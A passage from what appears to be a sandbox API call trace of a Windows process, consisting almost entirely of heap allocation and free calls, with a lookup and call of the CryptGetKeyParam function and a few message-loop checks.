hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.751] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafa0 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0079.751] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0079.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0079.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0079.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0079.752] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0079.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0079.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0079.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0079.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0079.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0079.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0079.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.752] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0079.752] CryptGetKeyParam (in: hKey=0x41ac740, dwParam=0x7, pbData=0x43e27c0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e27c0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0079.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0079.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43eada8 [0079.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0079.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0079.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.752] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0079.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb060 | out: hHeap=0x1780000) returned 1 [0079.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0079.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0079.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadd8 | out: hHeap=0x1780000) returned 1 [0079.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0079.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.753] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e08 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caef8 [0079.753] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae80 [0079.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0079.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0079.754] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.754] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0079.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0079.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0079.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0079.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0079.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0079.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0079.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0079.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0079.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d98 | out: hHeap=0x1780000) returned 1 [0079.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0079.755] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0079.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0079.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0079.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0079.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0079.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0079.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0079.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0079.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0079.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0079.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0079.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb048 [0079.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0079.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb048 | out: hHeap=0x1780000) returned 1 [0079.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0008 [0079.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0079.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0079.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0079.755] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0079.755] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea958 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0079.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0079.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0079.756] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0079.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0079.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0079.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0079.756] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0079.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0079.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0079.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0079.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0079.756] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0079.756] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ee8 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0079.756] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0079.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0079.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0079.757] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafb8 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eada8 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0079.757] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cada8 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0079.758] HeapFree (in: hHeap=0x1780000, 